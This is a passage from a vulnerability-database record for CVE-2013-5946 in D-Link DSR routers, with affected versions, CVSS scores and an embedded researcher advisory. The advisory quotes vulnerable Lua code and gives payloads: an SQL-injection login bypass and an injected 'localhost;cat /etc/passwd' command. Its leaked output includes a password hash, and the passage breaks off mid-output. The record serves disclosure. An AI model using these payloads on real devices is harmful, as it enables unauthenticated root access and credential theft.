      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-1000n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-150n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-250n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr router dsr-500n",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b31"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b56"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b20"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.01b46"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b39"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b43"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.08b51"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b53"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.06b53"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.05b48"
      },
      {
        "_id": null,
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-150",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "0"
      },
      {
        "_id": null,
        "model": "dsr-500n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-500 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250n 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-250 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150n 1.05b64",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-150 1.08b44",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000n 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "_id": null,
        "model": "dsr-1000 1.08b77",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "configurations": {
    "_id": null,
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.05b48",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b29",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b39",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.08b51",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b36:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.04b58:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b43:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:1.06b53:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "nu11.nu11",
    "sources": [
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-5946",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2013-5946",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15237",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-65948",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-5946",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15237",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-320",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-65948",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section. D-Link DSR is a wireless service router product. There is a remote arbitrary command execution vulnerability in the implementation of the D-Link DSR router family. Successful use can allow an attacker to execute arbitrary commands with root privileges. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions. #\n# CVEs:                  \n#     CVE-2013-5945 - Authentication Bypass by SQL-Injection\n#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers:    \n#     D-Link DSR-150 (Firmware \u003c v1.08B44)\n#     D-Link DSR-150N (Firmware \u003c v1.05B64)\n#     D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n#     D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n#     D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL:      \n#     http://tsd.dlink.com.tw\n# \n# Arch:                  \n#     mips and armv6l, Linux\n# \n# Author:                \n#     0_o -- null_null\n#     nu11.nu11 [at] yahoo.com\n#\n# Date:                  \n#     2013-08-18\n# \n# Purpose:               \n#     Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites:         \n#     Network access to the router ports 443 and 23. \n#     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n#   DSR-150:                Firmware v1.08B44\n#   DSR-150N:               Firmware v1.05B64\n#   DSR-250 and DSR-250N:   Firmware v1.08B44\n#   DSR-500 and DSR-500N:   Firmware v1.08B77\n#   DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n                  (CVE-2013-5945)\n2. Exposure:      D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure:      Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n                  (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. \n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n  function login.authenticate(tablename, tableInput)\n    local username = tableInput[\"Users.UserName\"]\n    local password = tableInput[\"Users.Password\"]\n    local cur = db.execute(string.format([[\n                  SELECT *, ROWID AS _ROWID_ FROM %s\n          WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n      ]], tablename, \"UserName\", username, \"Password\", password))\n    local result = false\n    local statusCode = \"NONE\"\n    if cur then\n      local row = cur:fetch({}, \"a\")\n      cur:close()\n      result = row ~= nil\n      if result == false then\n        statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n      end\n    end\n    return result, statusCode\n  end\n\n* This function creates an SQL statement of the form:\n\n  SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n  easily exploitable by providing this to the login form:\n\n  username = admin\n  password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n  SELECT * \n    FROM \"Users\" \n    WHERE \"UserName\" = \u0027admin\u0027 \n      AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n  -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n  local function runShellCmd(command)\n      local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n      local cmdOutput = pipe:read(\"*a\")\n      pipe:close()\n      return cmdOutput\n  end\n  if (ButtonType and ButtonType == \"ping\") then\n  [...]\n  local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n        globalCmdOutput = runShellCmd (cmd_ping) \n        statusMessage = \"Pinging \" .. ipToPing\n  [...]\n  elseif (ButtonType and ButtonType == \"traceroute\") then\n  [...]\n    local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n    globalCmdOutput = runShellCmd(cmd)\n    statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n  [...]\n  elseif (ButtonType and ButtonType == \"dnslookup\") then\n  [...]\n    util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n    statusMessage = \"DNS Lookup for \" .. Tools like curl are not hindered by these checks. \n  \n* All forms allow input like this:\n  \n  localhost;\u003ccommand\u003e\n  \n  example: \n  \n  localhost;cat /etc/passwd\n  \n* This user provided value is then directly used as part of the input for the\n  call to runShellCmd(c) and thus io.popen(c) in the first form section and \n  os.execute(c) in the second form section. \n  \n* Output from user provided commands gets displayed on the next page beneath \n  the benign command output. \n  \n  example: \n  \n  [...]\n  \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms\n    root:!:0:0:root:/root:/bin/sh\n    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n    nobody:x:0:0:nobody:/nonexistent:/bin/false\n    ZX4q9Q9JUpwTZuo7:x:0:2:Linux 